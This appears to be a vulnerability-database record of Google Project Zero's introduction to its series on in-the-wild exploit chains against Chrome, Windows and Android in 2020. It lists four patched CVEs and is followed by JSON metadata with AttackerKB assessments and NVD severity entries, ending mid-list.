ID GOOGLEPROJECTZERO:7B21B608699A0775A3608934DB89577B Type googleprojectzero Reporter GoogleProjectZero Modified 2021-01-12T00:00:00
Description
This is part 1 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, head to the bottom of this post.
At Project Zero we often refer to our goal simply as “make 0-day hard”. Members of the team approach this challenge mainly through the lens of offensive security research. And while we experiment a lot with new targets and methodologies in order to remain at the forefront of the field, it is important that the team doesn’t stray too far from the current state of the art. One of our efforts in this regard is the tracking of publicly known cases of zero-day vulnerabilities. We use this information to guide the research. Unfortunately, public 0-day reports rarely include captured exploits, which could provide invaluable insight into exploitation techniques and design decisions made by real-world attackers. In addition, we believe there to be a gap in the security community’s ability to detect 0-day exploits.
Therefore, Project Zero has recently launched our own initiative aimed at researching new ways to detect 0-day exploits in the wild. Through partnering with the Google Threat Analysis Group (TAG), one of the first results of this initiative was the discovery of a watering hole attack in Q1 2020 performed by a highly sophisticated actor.
We discovered two exploit servers delivering different exploit chains via watering hole attacks. One server targeted Windows users, the other targeted Android. Both the Windows and the Android servers used Chrome exploits for the initial remote code execution. The exploits for Chrome and Windows included 0-days. For Android, the exploit chains used publicly known n-day exploits. Based on the actor's sophistication, we think it's likely that they had access to Android 0-days, but we didn't discover any in our analysis.
From the exploit servers, we have extracted:
Renderer exploits for four bugs in Chrome, one of which was still a 0-day at the time of the discovery.
Two sandbox escape exploits abusing three 0-day vulnerabilities in Windows.
A “privilege escalation kit” composed of publicly known n-day exploits for older versions of Android.
The four 0-days discovered in these chains have been fixed by the appropriate vendors:
CVE-2020-6418 - Chrome Vulnerability in TurboFan (fixed February 2020)
CVE-2020-0938 - Font Vulnerability on Windows (fixed April 2020)
CVE-2020-1020 - Font Vulnerability on Windows (fixed April 2020)
CVE-2020-1027 - Windows CSRSS Vulnerability (fixed April 2020)
We understand this attacker to be operating a complex targeting infrastructure, though it didn't seem to be used every time. In some cases, the attackers used an initial renderer exploit to develop detailed fingerprints of the users from inside the sandbox. In these cases, the attacker took a slower approach: sending back dozens of parameters from the end users device, before deciding whether or not to continue with further exploitation and use a sandbox escape. In other cases, the attacker would choose to fully exploit a system straight away (or not attempt any exploitation at all). In the time we had available before the servers were taken down, we were unable to determine what parameters determined the "fast" or "slow" exploitation paths.
The Project Zero team came together and spent many months analyzing in detail each part of the collected chains. What did we learn? These exploit chains are designed for efficiency & flexibility through their modularity. They are well-engineered, complex code with a variety of novel exploitation methods, mature logging, sophisticated and calculated post-exploitation techniques, and high volumes of anti-analysis and targeting checks. We believe that teams of experts have designed and developed these exploit chains. We hope this blog post series provides others with an in-depth look at exploitation from a real world, mature, and presumably well-resourced actor.
The posts in this series share the technical details of different portions of the exploit chain, largely focused on what our team found most interesting. We include:
Detailed analysis of the vulnerabilities being exploited and each of the different exploit techniques,
A deep look into the bug class of one of the Chrome exploits, and
An in-depth teardown of the Android post-exploitation code.
In addition, we are posting root cause analyses for each of the four 0-days discovered as a part of these exploit chains.
Exploitation aside, the modularity of payloads, interchangeable exploitation chains, logging, targeting and maturity of this actor's operation set these apart. We hope that by sharing this information publicly, we are continuing to close the knowledge gap between private exploitation (what well resourced exploitation teams are doing in the real world) and what is publicly known.
We recommend reading the posts in the following order:
This is part 1 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To continue reading, see In The Wild Part 2: Chrome Infinity Bug.
{"id": "GOOGLEPROJECTZERO:7B21B608699A0775A3608934DB89577B", "type": "googleprojectzero", "bulletinFamily": "info", "title": "\nIntroducing the In-the-Wild Series\n", "description": "This is part 1 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, head to the bottom of this post.\n\nAt Project Zero we often refer to our goal simply as \u201cmake 0-day hard\u201d. Members of the team approach this challenge mainly through the lens of offensive security research. And while we experiment a lot with new targets and methodologies in order to remain at the forefront of the field, it is important that the team doesn\u2019t stray too far from the current state of the art. One of our efforts in this regard is [the tracking](<https://googleprojectzero.blogspot.com/p/0day.html>) of publicly known cases of zero-day vulnerabilities. We use this information to guide the research. Unfortunately, public 0-day reports rarely include captured exploits, which could provide invaluable insight into exploitation techniques and design decisions made by real-world attackers. In addition, we believe there to be [a gap in the security community\u2019s ability to detect 0-day exploits](<https://googleprojectzero.blogspot.com/2020/07/detection-deficit-year-in-review-of-0.html>).\n\nTherefore, Project Zero has recently launched our own initiative aimed at researching new ways to detect 0-day exploits in the wild. Through partnering with the Google Threat Analysis Group (TAG), one of the first results of this initiative was the discovery of a watering hole attack in Q1 2020 performed by a highly sophisticated actor. \n\nWe discovered two exploit servers delivering different exploit chains via watering hole attacks. One server targeted Windows users, the other targeted Android. Both the Windows and the Android servers used Chrome exploits for the initial remote code execution. The exploits for Chrome and Windows included 0-days. For Android, the exploit chains used publicly known n-day exploits. Based on the actor's sophistication, we think it's likely that they had access to Android 0-days, but we didn't discover any in our analysis.\n\n[](<https://1.bp.blogspot.com/-zEmmiLETGvY/X_jPzUuqg9I/AAAAAAAAalA/0uFEEpHDwfwPXP_WoxG4Y7L7iUNfVE1FwCNcBGAsYHQ/s1871/itw%2Bdiagram.png>)\n\nFrom the exploit servers, we have extracted:\n\n * Renderer exploits for four bugs in Chrome, one of which was still a 0-day at the time of the discovery.\n * Two sandbox escape exploits abusing three 0-day vulnerabilities in Windows.\n * A \u201cprivilege escalation kit\u201d composed of publicly known n-day exploits for older versions of Android.\n\nThe four 0-days discovered in these chains have been fixed by the appropriate vendors:\n\n * [CVE-2020-6418](<https://googleprojectzero.blogspot.com/p/rca-cve-2020-6418.html>) \\- Chrome Vulnerability in TurboFan (fixed February 2020)\n * [CVE-2020-0938](<https://googleprojectzero.blogspot.com/p/rca-cve-2020-0938.html>) \\- Font Vulnerability on Windows (fixed April 2020)\n * [CVE-2020-1020](<https://googleprojectzero.blogspot.com/p/rca-cve-2020-1020.html>) \\- Font Vulnerability on Windows (fixed April 2020)\n * [CVE-2020-1027](<https://googleprojectzero.blogspot.com/p/rca-cve-2020-1027.html>) \\- Windows CSRSS Vulnerability (fixed April 2020)\n\nWe understand this attacker to be operating a complex targeting infrastructure, though it didn't seem to be used every time. In some cases, the attackers used an initial renderer exploit to develop detailed fingerprints of the users from inside the sandbox. In these cases, the attacker took a slower approach: sending back dozens of parameters from the end users device, before deciding whether or not to continue with further exploitation and use a sandbox escape. In other cases, the attacker would choose to fully exploit a system straight away (or not attempt any exploitation at all). In the time we had available before the servers were taken down, we were unable to determine what parameters determined the \"fast\" or \"slow\" exploitation paths. \n\nThe Project Zero team came together and spent many months analyzing in detail each part of the collected chains. What did we learn? These exploit chains are designed for efficiency & flexibility through their modularity. They are well-engineered, complex code with a variety of novel exploitation methods, mature logging, sophisticated and calculated post-exploitation techniques, and high volumes of anti-analysis and targeting checks. We believe that teams of experts have designed and developed these exploit chains. We hope this blog post series provides others with an in-depth look at exploitation from a real world, mature, and presumably well-resourced actor.\n\nThe posts in this series share the technical details of different portions of the exploit chain, largely focused on what our team found most interesting. We include:\n\n * Detailed analysis of the vulnerabilities being exploited and each of the different exploit techniques,\n * A deep look into the bug class of one of the Chrome exploits, and\n * An in-depth teardown of the Android post-exploitation code.\n\nIn addition, we are posting [root cause analyses ](<https://googleprojectzero.blogspot.com/p/rca.html>)for each of the four 0-days discovered as a part of these exploit chains. \n\nExploitation aside, the modularity of payloads, interchangeable exploitation chains, logging, targeting and maturity of this actor's operation set these apart. We hope that by sharing this information publicly, we are continuing to close the knowledge gap between private exploitation (what well resourced exploitation teams are doing in the real world) and what is publicly known.\n\nWe recommend reading the posts in the following order:\n\n 1. Introduction (this post)\n 2. [Chrome: Infinity Bug](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-chrome-infinity-bug.html>)\n 3. [Chrome Exploits](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-chrome-exploits.html>)\n 4. [Android Exploits](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-android-exploits.html>)\n 5. [Android Post-Exploitation](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-android-post-exploitation.html>)\n 6. [Windows Exploits](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-windows-exploits.html>)\n\nThis is part 1 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To continue reading, see [In The Wild Part 2: Chrome Infinity Bug](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-chrome-infinity-bug.html>).\n", "published": "2021-01-12T00:00:00", "modified": "2021-01-12T00:00:00", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://googleprojectzero.blogspot.com/2021/01/introducing-in-wild-series.html", "reporter": "GoogleProjectZero", "references": [], "cvelist": ["CVE-2020-0938", "CVE-2020-1020", "CVE-2020-1027", "CVE-2020-6418"], "lastseen": "2021-01-13T07:24:00", "viewCount": 51, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:59EFDEC4-921E-411A-8743-CB603C4BC068", "AKB:F1FF517B-6FF7-4972-9CA6-6F009CD86E66", "AKB:D673396D-06D8-4D50-B1AD-97679B53A487", "AKB:D1AE859F-1644-40D4-9203-7D8D97ABBB49"]}, {"type": "cve", "idList": ["CVE-2020-1027", "CVE-2020-6418", "CVE-2020-1020", "CVE-2020-0938"]}, {"type": "threatpost", "idList": ["THREATPOST:6F7E512F15913694CF17A906715FE678", "THREATPOST:04ACAD235492D0B01F4F6E92CADC43FF", "THREATPOST:88098D30DA04E912B06C03B52556385C", "THREATPOST:310514802AFEB1D9D3CB611D5E2B576A", "THREATPOST:DF87733B74489628AB9F2C89704380A9"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:9523EA61EA974CED8A3D9198CD0D5F6D", "GOOGLEPROJECTZERO:C4CBD27E9FA33882CD77C7DAC1496DD3"]}, {"type": "krebs", "idList": ["KREBS:1093D39181F7F724932AED0E8DA017A8"]}, {"type": "thn", "idList": ["THN:D8AAE3E21499FA77C4C1B73C1DDA01E1", "THN:DC209DD441842FCD2682680F22D67854"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:65D9653A8189263EAD9C1C00AA7E205A", "QUALYSBLOG:CD5A810958CA7B4F6BB934D2C74500EA"]}, {"type": "mscve", "idList": ["MS:CVE-2020-1027", "MS:ADV200002", "MS:ADV200006", "MS:CVE-2020-1020", "MS:CVE-2020-0938"]}, {"type": "exploitdb", "idList": ["EDB-ID:48186"]}, {"type": "zdt", "idList": ["1337DAY-ID-34056"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/BROWSER/CHROME_JSCREATE_SIDEEFFECT"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156632"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20200805-01-WINDOWS"]}, {"type": "cert", "idList": ["VU:354840"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0259-1", "OPENSUSE-SU-2020:0245-1"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310816828", "OPENVAS:1361412562310816584", "OPENVAS:1361412562310816827", "OPENVAS:1361412562310816826", "OPENVAS:1361412562310816829", "OPENVAS:1361412562310816586", "OPENVAS:1361412562310816585", "OPENVAS:1361412562310816824", "OPENVAS:1361412562310853048", "OPENVAS:1361412562310816823"]}, {"type": "nessus", "idList": ["SMB_NT_MS20_APR_4550951.NASL", "SMB_NT_MS20_APR_4550917.NASL", "SMB_NT_MS20_APR_4550961.NASL", "MACOSX_GOOGLE_CHROME_80_0_3987_122.NASL", "SMB_NT_MS20_APR_4550930.NASL", "GOOGLE_CHROME_80_0_3987_122.NASL", "REDHAT-RHSA-2020-0738.NASL", "SMB_NT_MS20_APR_4550964.NASL", "MICROSOFT_EDGE_CHROMIUM_80_0_361_62.NASL", "OPENSUSE-2020-259.NASL"]}, {"type": "archlinux", "idList": ["ASA-202002-11"]}, {"type": "kaspersky", "idList": ["KLA11678", "KLA11744", "KLA11722", "KLA11743"]}, {"type": "redhat", "idList": ["RHSA-2020:0738"]}, {"type": "securelist", "idList": ["SECURELIST:D0FFA6E46D43B7A592C34676F2EF3EDB"]}, {"type": "avleonov", "idList": ["AVLEONOV:6A714F9BC2BBE696D3586B2629169491"]}, {"type": "fedora", "idList": ["FEDORA:C3C866194B96", "FEDORA:6395E630FBA4"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4638-1:8959D"]}, {"type": "gentoo", "idList": ["GLSA-202003-08"]}], "modified": "2021-01-13T07:24:00", "rev": 2}, "score": {"value": 6.0, "vector": "NONE", "modified": "2021-01-13T07:24:00", "rev": 2}, "vulnersScore": 6.0}}
{"attackerkb": [{"lastseen": "2020-11-22T06:11:20", "bulletinFamily": "info", "cvelist": ["CVE-2020-0938", "CVE-2020-1020"], "description": "A remote code execution vulnerability exists in Microsoft Windows when the Windows Adobe Type Manager Library improperly handles a specially-crafted multi-master font \u2013 Adobe Type 1 PostScript format.For all systems except Windows 10, an attacker who successfully exploited the vulnerability could execute code remotely, aka \u2018Adobe Font Manager Library Remote Code Execution Vulnerability\u2019. This CVE ID is unique from CVE-2020-0938.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at November 22, 2020 2:27am UTC reported:\n\nReported as exploited in the wild as part of Google\u2019s 2020 0day vulnerability spreadsheet they made available at <https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=1869060786>. Original tweet announcing this spreadsheet with the 2020 findings can be found at <https://twitter.com/maddiestone/status/1329837665378725888>\n\nThis is pretty similar to CVE-2020-1020 and its possible they were used together in a single attack, although for now this is just my theory and without full evidence this should be taken with a healthy few grains of salt.\n", "modified": "2020-09-02T00:00:00", "published": "2020-04-15T00:00:00", "id": "AKB:D673396D-06D8-4D50-B1AD-97679B53A487", "href": "https://attackerkb.com/topics/IE2z4hqlku/cve-2020-1020", "type": "attackerkb", "title": "CVE-2020-1020", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-22T06:11:38", "bulletinFamily": "info", "cvelist": ["CVE-2020-6418"], "description": "Type confusion in V8 in Google Chrome prior to 80.0.3987.122 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.\n\n \n**Recent assessments:** \n \n**J3rryBl4nks** at March 04, 2020 4:42pm UTC reported:\n\nYou would have to chain this vulnerability with a working sandbox escape in order to get full value. While there are no doubt working sandbox escapes, this is only one piece of the exploit chain that is necessary to get a reliable foothold on a machine.\n\nOften times there are full chain exploits published which include the code exec, sandbox escape, and a valid privesc but I have been unable to find a full chain for this exploit.\n\nFor the average attacker, this hill would be too high to climb to make this useful.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 1**tekwizz123** at March 09, 2020 2:14am UTC reported:\n\nYou would have to chain this vulnerability with a working sandbox escape in order to get full value. While there are no doubt working sandbox escapes, this is only one piece of the exploit chain that is necessary to get a reliable foothold on a machine.\n\nOften times there are full chain exploits published which include the code exec, sandbox escape, and a valid privesc but I have been unable to find a full chain for this exploit.\n\nFor the average attacker, this hill would be too high to climb to make this useful.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 3**kevthehermit** at March 04, 2020 4:01pm UTC reported:\n\nYou would have to chain this vulnerability with a working sandbox escape in order to get full value. While there are no doubt working sandbox escapes, this is only one piece of the exploit chain that is necessary to get a reliable foothold on a machine.\n\nOften times there are full chain exploits published which include the code exec, sandbox escape, and a valid privesc but I have been unable to find a full chain for this exploit.\n\nFor the average attacker, this hill would be too high to climb to make this useful.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 1**gwillcox-r7** at November 22, 2020 2:19am UTC reported:\n\nYou would have to chain this vulnerability with a working sandbox escape in order to get full value. While there are no doubt working sandbox escapes, this is only one piece of the exploit chain that is necessary to get a reliable foothold on a machine.\n\nOften times there are full chain exploits published which include the code exec, sandbox escape, and a valid privesc but I have been unable to find a full chain for this exploit.\n\nFor the average attacker, this hill would be too high to climb to make this useful.\n", "modified": "2020-07-30T00:00:00", "published": "2020-02-27T00:00:00", "id": "AKB:F1FF517B-6FF7-4972-9CA6-6F009CD86E66", "href": "https://attackerkb.com/topics/lMn6eEE22f/cve-2020-6418", "type": "attackerkb", "title": "CVE-2020-6418", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-11-22T06:11:17", "bulletinFamily": "info", "cvelist": ["CVE-2020-0913", "CVE-2020-1000", "CVE-2020-1003", "CVE-2020-1027"], "description": "An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory, aka \u2018Windows Kernel Elevation of Privilege Vulnerability\u2019. This CVE ID is unique from CVE-2020-0913, CVE-2020-1000, CVE-2020-1003.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at November 22, 2020 2:27am UTC reported:\n\nReported as exploited in the wild as part of Google\u2019s 2020 0day vulnerability spreadsheet they made available at <https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=1869060786>. Original tweet announcing this spreadsheet with the 2020 findings can be found at <https://twitter.com/maddiestone/status/1329837665378725888>\n", "modified": "2020-07-24T00:00:00", "published": "2020-04-15T00:00:00", "id": "AKB:D1AE859F-1644-40D4-9203-7D8D97ABBB49", "href": "https://attackerkb.com/topics/y0GBp0P90z/cve-2020-1027", "type": "attackerkb", "title": "CVE-2020-1027", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-05T21:17:53", "bulletinFamily": "info", "cvelist": ["CVE-2020-0938", "CVE-2020-1020"], "description": "A remote code execution vulnerability exists in Microsoft Windows when the Windows Adobe Type Manager Library improperly handles a specially-crafted multi-master font \u2013 Adobe Type 1 PostScript format.For all systems except Windows 10, an attacker who successfully exploited the vulnerability could execute code remotely, aka \u2018Adobe Font Manager Library Remote Code Execution Vulnerability\u2019. This CVE ID is unique from CVE-2020-1020.\n\n \n**Recent assessments:** \n \n**busterb** at March 24, 2020 12:11pm UTC reported:\n\nA fairly standard policy of disabling preview windows is a good mitigation for this vulnerability. Since this appears to have been found in the wild, but I\u2019m lowering this from original assessment, due to it being patched in the latest April 2020 PT, and there wasn\u2019t a particular rush to fix it out of band.\n\nTencent has an analysis of the vulnerabilities based on the PT diffs: <https://mp.weixin.qq.com/s/RvTZWvcXiXsI7xB6L9RWIg>\n\nFrom the MSRC advisory, this has limited impact on Windows 10.\n\n> For systems running supported versions of Windows 10 a successful attack could only result in code execution within an AppContainer sandbox context with limited privileges and capabilities.\n\nAssessed Attacker Value: 2 \nAssessed Attacker Value: 4**bac2binary** at April 15, 2020 4:26pm UTC reported:\n\nA fairly standard policy of disabling preview windows is a good mitigation for this vulnerability. Since this appears to have been found in the wild, but I\u2019m lowering this from original assessment, due to it being patched in the latest April 2020 PT, and there wasn\u2019t a particular rush to fix it out of band.\n\nTencent has an analysis of the vulnerabilities based on the PT diffs: <https://mp.weixin.qq.com/s/RvTZWvcXiXsI7xB6L9RWIg>\n\nFrom the MSRC advisory, this has limited impact on Windows 10.\n\n> For systems running supported versions of Windows 10 a successful attack could only result in code execution within an AppContainer sandbox context with limited privileges and capabilities.\n\nAssessed Attacker Value: 2 \nAssessed Attacker Value: 3**gwillcox-r7** at November 22, 2020 2:24am UTC reported:\n\nA fairly standard policy of disabling preview windows is a good mitigation for this vulnerability. Since this appears to have been found in the wild, but I\u2019m lowering this from original assessment, due to it being patched in the latest April 2020 PT, and there wasn\u2019t a particular rush to fix it out of band.\n\nTencent has an analysis of the vulnerabilities based on the PT diffs: <https://mp.weixin.qq.com/s/RvTZWvcXiXsI7xB6L9RWIg>\n\nFrom the MSRC advisory, this has limited impact on Windows 10.\n\n> For systems running supported versions of Windows 10 a successful attack could only result in code execution within an AppContainer sandbox context with limited privileges and capabilities.\n", "modified": "2020-09-02T00:00:00", "published": "2020-04-15T00:00:00", "id": "AKB:59EFDEC4-921E-411A-8743-CB603C4BC068", "href": "https://attackerkb.com/topics/P39wRxHASb/adv200006---type-1-font-parsing-remote-code-execution-vulnerability-in-windows", "type": "attackerkb", "title": "ADV200006 - Type 1 Font Parsing Remote Code Execution Vulnerability in Windows", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2021-02-02T07:37:11", "description": "Type confusion in V8 in Google Chrome prior to 80.0.3987.122 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "edition": 15, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 3.6}, "published": "2020-02-27T23:15:00", "title": "CVE-2020-6418", "type": "cve", "cwe": ["CWE-843"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-6418"], "modified": "2020-03-05T17:15:00", "cpe": [], "id": "CVE-2020-6418", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-6418", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cpe23": []}, {"lastseen": "2021-02-06T14:31:15", "description": "A remote code execution vulnerability exists in Microsoft Windows when the Windows Adobe Type Manager Library improperly handles a specially-crafted multi-master font - Adobe Type 1 PostScript format.For all systems except Windows 10, an attacker who successfully exploited the vulnerability could execute code remotely, aka 'Adobe Font Manager Library Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1020.", "edition": 6, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-04-15T15:15:00", "title": "CVE-2020-0938", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0938"], "modified": "2021-02-05T18:15:00", "cpe": ["cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_server_2016:1803", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_10:1709", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_server_2016:1903"], "id": "CVE-2020-0938", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-0938", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1709:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:itanium:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T07:36:54", "description": "An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory, aka 'Windows Kernel Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-0913, CVE-2020-1000, CVE-2020-1003.", "edition": 5, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-04-15T15:15:00", "title": "CVE-2020-1027", "type": "cve", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1027"], "modified": "2020-04-21T15:19:00", "cpe": ["cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_server_2016:1803", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_10:1709", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_server_2016:1903"], "id": "CVE-2020-1027", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-1027", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1709:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:itanium:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", 